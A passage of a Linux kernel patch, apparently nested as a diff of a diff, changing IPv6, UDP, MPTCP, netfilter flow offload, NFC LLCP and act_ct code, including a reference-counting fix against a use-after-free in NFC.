+ 	mtu = cork->gso_size ? IP6_MAX_MTU : cork->fragsize;
+ 	orig_mtu = mtu;
+ 
+-	if (cork->tx_flags & SKBTX_ANY_SW_TSTAMP &&
+-	    sk->sk_tsflags & SOF_TIMESTAMPING_OPT_ID)
++	if (cork->tx_flags & SKBTX_ANY_TSTAMP &&
++	    READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_OPT_ID)
+ 		tskey = atomic_inc_return(&sk->sk_tskey) - 1;
+ 
+ 	hh_len = LL_RESERVED_SPACE(rt->dst.dev);
+diff --git a/net/ipv6/ping.c b/net/ipv6/ping.c
+index 4d5a27dd9a4b2..a5d7d1915ba7e 100644
+--- a/net/ipv6/ping.c
++++ b/net/ipv6/ping.c
+@@ -119,7 +119,7 @@ static int ping_v6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		return -EINVAL;
+ 
+ 	ipcm6_init_sk(&ipc6, np);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	fl6.flowi6_oif = oif;
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index df3abd9e5237c..dc31752a7edcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -776,7 +776,7 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	fl6.flowi6_uid = sk->sk_uid;
+ 
+ 	ipcm6_init(&ipc6);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = fl6.flowi6_mark;
+ 
+ 	if (sin6) {
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 7be89dcfd5fc5..ba9a22db5805c 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -2158,6 +2158,7 @@ struct proto tcpv6_prot = {
+ 	.keepalive		= tcp_set_keepalive,
+ 	.recvmsg		= tcp_recvmsg,
+ 	.sendmsg		= tcp_sendmsg,
++	.splice_eof		= tcp_splice_eof,
+ 	.sendpage		= tcp_sendpage,
+ 	.backlog_rcv		= tcp_v6_do_rcv,
+ 	.release_cb		= tcp_release_cb,
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 64b36c2ba774a..961106eda69d0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -440,7 +440,7 @@ try_again:
+ 						      (struct sockaddr *)sin6);
+ 	}
+ 
+-	if (udp_sk(sk)->gro_enabled)
++	if (udp_test_bit(GRO_ENABLED, sk))
+ 		udp_cmsg_recv(msg, sk, skb);
+ 
+ 	if (np->rxopt.all)
+@@ -598,7 +598,7 @@ int __udp6_lib_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	sk = __udp6_lib_lookup(net, daddr, uh->dest, saddr, uh->source,
+ 			       inet6_iif(skb), inet6_sdif(skb), udptable, NULL);
+ 
+-	if (!sk || udp_sk(sk)->encap_type) {
++	if (!sk || READ_ONCE(udp_sk(sk)->encap_type)) {
+ 		/* No socket for error: try tunnels before discarding */
+ 		if (static_branch_unlikely(&udpv6_encap_needed_key)) {
+ 			sk = __udp6_lib_err_encap(net, hdr, offset, uh,
+@@ -712,7 +712,8 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 	}
+ 	nf_reset_ct(skb);
+ 
+-	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
++	if (static_branch_unlikely(&udpv6_encap_needed_key) &&
++	    READ_ONCE(up->encap_type)) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+ 
+ 		/*
+@@ -882,7 +883,7 @@ start_lookup:
+ 		/* If zero checksum and no_check is not on for
+ 		 * the socket then skip it.
+ 		 */
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx)
++		if (!uh->check && !udp_get_no_check6_rx(sk))
+ 			continue;
+ 		if (!first) {
+ 			first = sk;
+@@ -1000,7 +1001,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 		if (unlikely(rcu_dereference(sk->sk_rx_dst) != dst))
+ 			udp6_sk_rx_dst_set(sk, dst);
+ 
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx) {
++		if (!uh->check && !udp_get_no_check6_rx(sk)) {
+ 			if (refcounted)
+ 				sock_put(sk);
+ 			goto report_csum_error;
+@@ -1022,7 +1023,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 	/* Unicast */
+ 	sk = __udp6_lib_lookup_skb(skb, uh->source, uh->dest, udptable);
+ 	if (sk) {
+-		if (!uh->check && !udp_sk(sk)->no_check6_rx)
++		if (!uh->check && !udp_get_no_check6_rx(sk))
+ 			goto report_csum_error;
+ 		return udp6_unicast_rcv_skb(sk, skb, uh);
+ 	}
+@@ -1260,7 +1261,7 @@ static int udp_v6_send_skb(struct sk_buff *skb, struct flowi6 *fl6,
+ 			kfree_skb(skb);
+ 			return -EINVAL;
+ 		}
+-		if (udp_sk(sk)->no_check6_tx) {
++		if (udp_get_no_check6_tx(sk)) {
+ 			kfree_skb(skb);
+ 			return -EINVAL;
+ 		}
+@@ -1281,7 +1282,7 @@ static int udp_v6_send_skb(struct sk_buff *skb, struct flowi6 *fl6,
+ 
+ 	if (is_udplite)
+ 		csum = udplite_csum(skb);
+-	else if (udp_sk(sk)->no_check6_tx) {   /* UDP csum disabled */
++	else if (udp_get_no_check6_tx(sk)) {   /* UDP csum disabled */
+ 		skb->ip_summed = CHECKSUM_NONE;
+ 		goto send;
+ 	} else if (skb->ip_summed == CHECKSUM_PARTIAL) { /* UDP hardware csum */
+@@ -1351,14 +1352,14 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	int addr_len = msg->msg_namelen;
+ 	bool connected = false;
+ 	int ulen = len;
+-	int corkreq = READ_ONCE(up->corkflag) || msg->msg_flags&MSG_MORE;
++	int corkreq = udp_test_bit(CORK, sk) || msg->msg_flags & MSG_MORE;
+ 	int err;
+ 	int is_udplite = IS_UDPLITE(sk);
+ 	int (*getfrag)(void *, char *, int, int, int, struct sk_buff *);
+ 
+ 	ipcm6_init(&ipc6);
+ 	ipc6.gso_size = READ_ONCE(up->gso_size);
+-	ipc6.sockc.tsflags = sk->sk_tsflags;
++	ipc6.sockc.tsflags = READ_ONCE(sk->sk_tsflags);
+ 	ipc6.sockc.mark = READ_ONCE(sk->sk_mark);
+ 
+ 	/* destination address check */
+@@ -1657,6 +1658,20 @@ do_confirm:
+ 	goto out;
+ }
+ 
++static void udpv6_splice_eof(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	struct udp_sock *up = udp_sk(sk);
++
++	if (!up->pending || udp_test_bit(CORK, sk))
++		return;
++
++	lock_sock(sk);
++	if (up->pending && !udp_test_bit(CORK, sk))
++		udp_v6_push_pending_frames(sk);
++	release_sock(sk);
++}
++
+ void udpv6_destroy_sock(struct sock *sk)
+ {
+ 	struct udp_sock *up = udp_sk(sk);
+@@ -1674,7 +1689,7 @@ void udpv6_destroy_sock(struct sock *sk)
+ 			if (encap_destroy)
+ 				encap_destroy(sk);
+ 		}
+-		if (up->encap_enabled) {
++		if (udp_test_bit(ENCAP_ENABLED, sk)) {
+ 			static_branch_dec(&udpv6_encap_needed_key);
+ 			udp_encap_disable();
+ 		}
+@@ -1768,6 +1783,7 @@ struct proto udpv6_prot = {
+ 	.getsockopt		= udpv6_getsockopt,
+ 	.sendmsg		= udpv6_sendmsg,
+ 	.recvmsg		= udpv6_recvmsg,
++	.splice_eof		= udpv6_splice_eof,
+ 	.release_cb		= ip6_datagram_release_cb,
+ 	.hash			= udp_lib_hash,
+ 	.unhash			= udp_lib_unhash,
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 4907ab241d6be..4156387248e40 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -81,14 +81,14 @@ int xfrm6_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	struct ipv6hdr *ip6h;
+ 	int len;
+ 	int ip6hlen = sizeof(struct ipv6hdr);
+-
+ 	__u8 *udpdata;
+ 	__be32 *udpdata32;
+-	__u16 encap_type = up->encap_type;
++	u16 encap_type;
+ 
+ 	if (skb->protocol == htons(ETH_P_IP))
+ 		return xfrm4_udp_encap_rcv(sk, skb);
+ 
++	encap_type = READ_ONCE(up->encap_type);
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 03608d3ded4b8..8d21ff25f1602 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -1139,9 +1139,9 @@ static void l2tp_tunnel_destruct(struct sock *sk)
+ 	switch (tunnel->encap) {
+ 	case L2TP_ENCAPTYPE_UDP:
+ 		/* No longer an encapsulation socket. See net/ipv4/udp.c */
+-		(udp_sk(sk))->encap_type = 0;
+-		(udp_sk(sk))->encap_rcv = NULL;
+-		(udp_sk(sk))->encap_destroy = NULL;
++		WRITE_ONCE(udp_sk(sk)->encap_type, 0);
++		udp_sk(sk)->encap_rcv = NULL;
++		udp_sk(sk)->encap_destroy = NULL;
+ 		break;
+ 	case L2TP_ENCAPTYPE_IP:
+ 		break;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index d611783c2601f..8ed7769cae836 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1899,6 +1899,17 @@ static void tcp_release_cb_override(struct sock *ssk)
+ 	tcp_release_cb(ssk);
+ }
+ 
++static int tcp_abort_override(struct sock *ssk, int err)
++{
++	/* closing a listener subflow requires a great deal of care.
++	 * keep it simple and just prevent such operation
++	 */
++	if (inet_sk_state_load(ssk) == TCP_LISTEN)
++		return -EINVAL;
++
++	return tcp_abort(ssk, err);
++}
++
+ static struct tcp_ulp_ops subflow_ulp_ops __read_mostly = {
+ 	.name		= "mptcp",
+ 	.owner		= THIS_MODULE,
+@@ -1942,6 +1953,7 @@ void __init mptcp_subflow_init(void)
+ 
+ 	tcp_prot_override = tcp_prot;
+ 	tcp_prot_override.release_cb = tcp_release_cb_override;
++	tcp_prot_override.diag_destroy = tcp_abort_override;
+ 
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+ 	/* In struct mptcp_subflow_request_sock, we assume the TCP request sock
+@@ -1977,6 +1989,7 @@ void __init mptcp_subflow_init(void)
+ 
+ 	tcpv6_prot_override = tcpv6_prot;
+ 	tcpv6_prot_override.release_cb = tcp_release_cb_override;
++	tcpv6_prot_override.diag_destroy = tcp_abort_override;
+ #endif
+ 
+ 	mptcp_diag_subflow_init(&subflow_ulp_ops);
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index 7243079ef3546..b452eb3ddcecb 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -994,7 +994,7 @@ ip_vs_prepare_tunneled_skb(struct sk_buff *skb, int skb_af,
+ 		old_dsfield = ipv4_get_dsfield(old_iph);
+ 		*ttl = old_iph->ttl;
+ 		if (payload_len)
+-			*payload_len = ntohs(old_iph->tot_len);
++			*payload_len = skb_ip_totlen(skb);
+ 	}
+ 
+ 	/* Implement full-functionality option for ECN encapsulation */
+diff --git a/net/netfilter/nf_flow_table_core.c b/net/netfilter/nf_flow_table_core.c
+index 81c26a96c30bb..c1d99cb370b44 100644
+--- a/net/netfilter/nf_flow_table_core.c
++++ b/net/netfilter/nf_flow_table_core.c
+@@ -314,12 +314,12 @@ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow)
+ EXPORT_SYMBOL_GPL(flow_offload_add);
+ 
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+-			  struct flow_offload *flow)
++			  struct flow_offload *flow, bool force)
+ {
+ 	u32 timeout;
+ 
+ 	timeout = nf_flowtable_time_stamp + flow_offload_get_timeout(flow);
+-	if (timeout - READ_ONCE(flow->timeout) > HZ)
++	if (force || timeout - READ_ONCE(flow->timeout) > HZ)
+ 		WRITE_ONCE(flow->timeout, timeout);
+ 	else
+ 		return;
+@@ -416,11 +416,18 @@ nf_flow_table_iterate(struct nf_flowtable *flow_table,
+ 	return err;
+ }
+ 
++static bool nf_flow_custom_gc(struct nf_flowtable *flow_table,
++			      const struct flow_offload *flow)
++{
++	return flow_table->type->gc && flow_table->type->gc(flow);
++}
++
+ static void nf_flow_offload_gc_step(struct nf_flowtable *flow_table,
+ 				    struct flow_offload *flow, void *data)
+ {
+ 	if (nf_flow_has_expired(flow) ||
+-	    nf_ct_is_dying(flow->ct))
++	    nf_ct_is_dying(flow->ct) ||
++	    nf_flow_custom_gc(flow_table, flow))
+ 		flow_offload_teardown(flow);
+ 
+ 	if (test_bit(NF_FLOW_TEARDOWN, &flow->flags)) {
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 0ccabf3fa6aa3..9505f9d188ff2 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -39,7 +39,7 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ }
+ 
+ static int nf_flow_rule_route_inet(struct net *net,
+-				   const struct flow_offload *flow,
++				   struct flow_offload *flow,
+ 				   enum flow_offload_tuple_dir dir,
+ 				   struct nf_flow_rule *flow_rule)
+ {
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index b350fe9d00b0b..6feaac9ab05c8 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -384,7 +384,7 @@ nf_flow_offload_ip_hook(void *priv, struct sk_buff *skb,
+ 	if (skb_try_make_writable(skb, thoff + hdrsize))
+ 		return NF_DROP;
+ 
+-	flow_offload_refresh(flow_table, flow);
++	flow_offload_refresh(flow_table, flow, false);
+ 
+ 	nf_flow_encap_pop(skb, tuplehash);
+ 	thoff -= offset;
+@@ -646,7 +646,7 @@ nf_flow_offload_ipv6_hook(void *priv, struct sk_buff *skb,
+ 	if (skb_try_make_writable(skb, thoff + hdrsize))
+ 		return NF_DROP;
+ 
+-	flow_offload_refresh(flow_table, flow);
++	flow_offload_refresh(flow_table, flow, false);
+ 
+ 	nf_flow_encap_pop(skb, tuplehash);
+ 
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 4d9b99abe37d6..1c26f03fc6617 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -679,7 +679,7 @@ nf_flow_rule_route_common(struct net *net, const struct flow_offload *flow,
+ 	return 0;
+ }
+ 
+-int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv4(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule)
+ {
+@@ -704,7 +704,7 @@ int nf_flow_rule_route_ipv4(struct net *net, const struct flow_offload *flow,
+ }
+ EXPORT_SYMBOL_GPL(nf_flow_rule_route_ipv4);
+ 
+-int nf_flow_rule_route_ipv6(struct net *net, const struct flow_offload *flow,
++int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ 			    enum flow_offload_tuple_dir dir,
+ 			    struct nf_flow_rule *flow_rule)
+ {
+@@ -735,7 +735,7 @@ nf_flow_offload_rule_alloc(struct net *net,
+ {
+ 	const struct nf_flowtable *flowtable = offload->flowtable;
+ 	const struct flow_offload_tuple *tuple, *other_tuple;
+-	const struct flow_offload *flow = offload->flow;
++	struct flow_offload *flow = offload->flow;
+ 	struct dst_entry *other_dst = NULL;
+ 	struct nf_flow_rule *flow_rule;
+ 	int err = -ENOMEM;
+@@ -895,8 +895,9 @@ static int flow_offload_rule_add(struct flow_offload_work *offload,
+ 
+ 	ok_count += flow_offload_tuple_add(offload, flow_rule[0],
+ 					   FLOW_OFFLOAD_DIR_ORIGINAL);
+-	ok_count += flow_offload_tuple_add(offload, flow_rule[1],
+-					   FLOW_OFFLOAD_DIR_REPLY);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		ok_count += flow_offload_tuple_add(offload, flow_rule[1],
++						   FLOW_OFFLOAD_DIR_REPLY);
+ 	if (ok_count == 0)
+ 		return -ENOENT;
+ 
+@@ -926,7 +927,8 @@ static void flow_offload_work_del(struct flow_offload_work *offload)
+ {
+ 	clear_bit(IPS_HW_OFFLOAD_BIT, &offload->flow->ct->status);
+ 	flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_ORIGINAL);
+-	flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_REPLY);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		flow_offload_tuple_del(offload, FLOW_OFFLOAD_DIR_REPLY);
+ 	set_bit(NF_FLOW_HW_DEAD, &offload->flow->flags);
+ }
+ 
+@@ -946,7 +948,9 @@ static void flow_offload_work_stats(struct flow_offload_work *offload)
+ 	u64 lastused;
+ 
+ 	flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_ORIGINAL, &stats[0]);
+-	flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_REPLY, &stats[1]);
++	if (test_bit(NF_FLOW_HW_BIDIRECTIONAL, &offload->flow->flags))
++		flow_offload_tuple_stats(offload, FLOW_OFFLOAD_DIR_REPLY,
++					 &stats[1]);
+ 
+ 	lastused = max_t(u64, stats[0].lastused, stats[1].lastused);
+ 	offload->flow->timeout = max_t(u64, offload->flow->timeout,
+diff --git a/net/netfilter/nf_log_syslog.c b/net/netfilter/nf_log_syslog.c
+index cb894f0d63e9d..c66689ad2b491 100644
+--- a/net/netfilter/nf_log_syslog.c
++++ b/net/netfilter/nf_log_syslog.c
+@@ -322,7 +322,7 @@ dump_ipv4_packet(struct net *net, struct nf_log_buf *m,
+ 
+ 	/* Max length: 46 "LEN=65535 TOS=0xFF PREC=0xFF TTL=255 ID=65535 " */
+ 	nf_log_buf_add(m, "LEN=%u TOS=0x%02X PREC=0x%02X TTL=%u ID=%u ",
+-		       ntohs(ih->tot_len), ih->tos & IPTOS_TOS_MASK,
++		       iph_totlen(skb, ih), ih->tos & IPTOS_TOS_MASK,
+ 		       ih->tos & IPTOS_PREC_MASK, ih->ttl, ntohs(ih->id));
+ 
+ 	/* Max length: 6 "CE DF MF " */
+diff --git a/net/netfilter/nf_tables_core.c b/net/netfilter/nf_tables_core.c
+index cee3e4e905ec8..e0c117229ee9d 100644
+--- a/net/netfilter/nf_tables_core.c
++++ b/net/netfilter/nf_tables_core.c
+@@ -141,7 +141,7 @@ static bool nft_payload_fast_eval(const struct nft_expr *expr,
+ 	else {
+ 		if (!(pkt->flags & NFT_PKTINFO_L4PROTO))
+ 			return false;
+-		ptr = skb_network_header(skb) + nft_thoff(pkt);
++		ptr = skb->data + nft_thoff(pkt);
+ 	}
+ 
+ 	ptr += priv->offset;
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 5f59dbab3e933..55fcf0280c5c3 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -78,7 +78,7 @@ static int nft_immediate_init(const struct nft_ctx *ctx,
+ 		case NFT_GOTO:
+ 			err = nf_tables_bind_chain(ctx, chain);
+ 			if (err < 0)
+-				return err;
++				goto err1;
+ 			break;
+ 		default:
+ 			break;
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 9fbfad13176f0..ca730cedb5d41 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -21,7 +21,7 @@ static bool
+ length_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	u_int16_t pktlen = ntohs(ip_hdr(skb)->tot_len);
++	u32 pktlen = skb_ip_totlen(skb);
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
+ }
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 1dac28136e6a3..18be13fb9b75a 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -145,6 +145,13 @@ static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
+ 
+ static struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
+ {
++	/* Since using nfc_llcp_local may result in usage of nfc_dev, whenever
++	 * we hold a reference to local, we also need to hold a reference to
++	 * the device to avoid UAF.
++	 */
++	if (!nfc_get_device(local->dev->idx))
++		return NULL;
++
+ 	kref_get(&local->ref);
+ 
+ 	return local;
+@@ -177,10 +184,18 @@ static void local_release(struct kref *ref)
+ 
+ int nfc_llcp_local_put(struct nfc_llcp_local *local)
+ {
++	struct nfc_dev *dev;
++	int ret;
++
+ 	if (local == NULL)
+ 		return 0;
+ 
+-	return kref_put(&local->ref, local_release);
++	dev = local->dev;
++
++	ret = kref_put(&local->ref, local_release);
++	nfc_put_device(dev);
++
++	return ret;
+ }
+ 
+ static struct nfc_llcp_sock *nfc_llcp_sock_get(struct nfc_llcp_local *local,
+@@ -959,8 +974,17 @@ static void nfc_llcp_recv_connect(struct nfc_llcp_local *local,
+ 	}
+ 
+ 	new_sock = nfc_llcp_sock(new_sk);
+-	new_sock->dev = local->dev;
++
+ 	new_sock->local = nfc_llcp_local_get(local);
++	if (!new_sock->local) {
++		reason = LLCP_DM_REJ;
++		sock_put(&new_sock->sk);
++		release_sock(&sock->sk);
++		sock_put(&sock->sk);
++		goto fail;
++	}
++
++	new_sock->dev = local->dev;
+ 	new_sock->rw = sock->rw;
+ 	new_sock->miux = sock->miux;
+ 	new_sock->nfc_protocol = sock->nfc_protocol;
+@@ -1597,7 +1621,16 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 	if (local == NULL)
+ 		return -ENOMEM;
+ 
+-	local->dev = ndev;
++	/* As we are going to initialize local's refcount, we need to get the
++	 * nfc_dev to avoid UAF, otherwise there is no point in continuing.
++	 * See nfc_llcp_local_get().
++	 */
++	local->dev = nfc_get_device(ndev->idx);
++	if (!local->dev) {
++		kfree(local);
++		return -ENODEV;
++	}
++
+ 	INIT_LIST_HEAD(&local->list);
+ 	kref_init(&local->ref);
+ 	mutex_init(&local->sdp_lock);
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index c8eaf4234b2e0..0591cfb289d50 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1252,7 +1252,7 @@ static int ovs_ct_commit(struct net *net, struct sw_flow_key *key,
+ 		if (err)
+ 			return err;
+ 
+-		nf_conn_act_ct_ext_add(ct);
++		nf_conn_act_ct_ext_add(skb, ct, ctinfo);
+ 	} else if (IS_ENABLED(CONFIG_NF_CONNTRACK_LABELS) &&
+ 		   labels_nonzero(&info->labels.mask)) {
+ 		err = ovs_ct_set_labels(ct, key, &info->labels.value,
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 4c7f7861ea967..d6d33f854050a 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -168,11 +168,11 @@ tcf_ct_flow_table_add_action_nat_udp(const struct nf_conntrack_tuple *tuple,
+ 
+ static void tcf_ct_flow_table_add_action_meta(struct nf_conn *ct,
+ 					      enum ip_conntrack_dir dir,
++					      enum ip_conntrack_info ctinfo,
+ 					      struct flow_action *action)
+ {
+ 	struct nf_conn_labels *ct_labels;
+ 	struct flow_action_entry *entry;
+-	enum ip_conntrack_info ctinfo;
+ 	u32 *act_ct_labels;
+ 
+ 	entry = tcf_ct_flow_table_flow_action_get_next(action);
+@@ -180,8 +180,6 @@ static void tcf_ct_flow_table_add_action_meta(struct nf_conn *ct,
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK_MARK)
+ 	entry->ct_metadata.mark = READ_ONCE(ct->mark);
+ #endif
+-	ctinfo = dir == IP_CT_DIR_ORIGINAL ? IP_CT_ESTABLISHED :
+-					     IP_CT_ESTABLISHED_REPLY;
+ 	/* aligns with the CT reference on the SKB nf_ct_set */
+ 	entry->ct_metadata.cookie = (unsigned long)ct | ctinfo;
+ 	entry->ct_metadata.orig_dir = dir == IP_CT_DIR_ORIGINAL;
+@@ -235,22 +233,26 @@ static int tcf_ct_flow_table_add_action_nat(struct net *net,
+ }
+ 
+ static int tcf_ct_flow_table_fill_actions(struct net *net,
+-					  const struct flow_offload *flow,
++					  struct flow_offload *flow,
+ 					  enum flow_offload_tuple_dir tdir,
+ 					  struct nf_flow_rule *flow_rule)
+ {
+ 	struct flow_action *action = &flow_rule->rule->action;
+ 	int num_entries = action->num_entries;
+ 	struct nf_conn *ct = flow->ct;
++	enum ip_conntrack_info ctinfo;
+ 	enum ip_conntrack_dir dir;
+ 	int i, err;
+ 
+ 	switch (tdir) {
+ 	case FLOW_OFFLOAD_DIR_ORIGINAL:
+ 		dir = IP_CT_DIR_ORIGINAL;
++		ctinfo = IP_CT_ESTABLISHED;
++		set_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags);
+ 		break;
+ 	case FLOW_OFFLOAD_DIR_REPLY:
+ 		dir = IP_CT_DIR_REPLY;
++		ctinfo = IP_CT_ESTABLISHED_REPLY;
+ 		break;
+ 	default:
+ 		return -EOPNOTSUPP;
+@@ -260,7 +262,7 @@ static int tcf_ct_flow_table_fill_actions(struct net *net,
+ 	if (err)
+ 		goto err_nat;
+ 
+-	tcf_ct_flow_table_add_action_meta(ct, dir, action);
++	tcf_ct_flow_table_add_action_meta(ct, dir, ctinfo, action);
+ 	return 0;
+ 
+ err_nat:
+@@ -272,8 +274,39 @@ err_nat:
+ 	return err;
+ }
+ 
++static bool tcf_ct_flow_is_outdated(const struct flow_offload *flow)
++{
++	return test_bit(IPS_SEEN_REPLY_BIT, &flow->ct->status) &&
++	       test_bit(IPS_HW_OFFLOAD_BIT, &flow->ct->status) &&
++	       !test_bit(NF_FLOW_HW_PENDING, &flow->flags) &&
++	       !test_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags);
++}
++
++static void tcf_ct_flow_table_get_ref(struct tcf_ct_flow_table *ct_ft);
++
++static void tcf_ct_nf_get(struct nf_flowtable *ft)
++{
++	struct tcf_ct_flow_table *ct_ft =
++		container_of(ft, struct tcf_ct_flow_table, nf_ft);
++
++	tcf_ct_flow_table_get_ref(ct_ft);
++}
++
++static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft);
++
++static void tcf_ct_nf_put(struct nf_flowtable *ft)
++{
++	struct tcf_ct_flow_table *ct_ft =
++		container_of(ft, struct tcf_ct_flow_table, nf_ft);
++
++	tcf_ct_flow_table_put(ct_ft);
++}
++
+ static struct nf_flowtable_type flowtable_ct = {
++	.gc		= tcf_ct_flow_is_outdated,
+ 	.action		= tcf_ct_flow_table_fill_actions,
++	.get		= tcf_ct_nf_get,
++	.put		= tcf_ct_nf_put,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+@@ -322,9 +355,13 @@ err_alloc:
+ 	return err;
+ }
+ 
++static void tcf_ct_flow_table_get_ref(struct tcf_ct_flow_table *ct_ft)
++{
++	refcount_inc(&ct_ft->ref);
++}
++
+ static void tcf_ct_flow_table_cleanup_work(struct work_struct *work)
+ {
+-	struct flow_block_cb *block_cb, *tmp_cb;
+ 	struct tcf_ct_flow_table *ct_ft;
+ 	struct flow_block *block;
+ 
+@@ -332,24 +369,18 @@ static void tcf_ct_flow_table_cleanup_work(struct work_struct *work)
+ 			     rwork);
+ 	nf_flow_table_free(&ct_ft->nf_ft);
+ 
+-	/* Remove any remaining callbacks before cleanup */
+ 	block = &ct_ft->nf_ft.flow_block;
+ 	down_write(&ct_ft->nf_ft.flow_block_lock);
+-	list_for_each_entry_safe(block_cb, tmp_cb, &block->cb_list, list) {
+-		list_del(&block_cb->list);
+-		flow_block_cb_free(block_cb);
+-	}
++	WARN_ON(!list_empty(&block->cb_list));
+ 	up_write(&ct_ft->nf_ft.flow_block_lock);
+ 	kfree(ct_ft);
+ 
+ 	module_put(THIS_MODULE);
+ }
+ 
+-static void tcf_ct_flow_table_put(struct tcf_ct_params *params)
++static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft)
+ {
+-	struct tcf_ct_flow_table *ct_ft = params->ct_ft;
+-
+-	if (refcount_dec_and_test(&params->ct_ft->ref)) {
++	if (refcount_dec_and_test(&ct_ft->ref)) {
+ 		rhashtable_remove_fast(&zones_ht, &ct_ft->node, zones_params);
+ 		INIT_RCU_WORK(&ct_ft->rwork, tcf_ct_flow_table_cleanup_work);
+ 		queue_rcu_work(act_ct_wq, &ct_ft->rwork);
+@@ -363,9 +394,20 @@ static void tcf_ct_flow_tc_ifidx(struct flow_offload *entry,
+ 	entry->tuplehash[dir].tuple.tc.iifidx = act_ct_ext->ifindex[dir];
+ }
+ 
++static void tcf_ct_flow_ct_ext_ifidx_update(struct flow_offload *entry)
++{
++	struct nf_conn_act_ct_ext *act_ct_ext;
++
++	act_ct_ext = nf_conn_act_ct_ext_find(entry->ct);
++	if (act_ct_ext) {
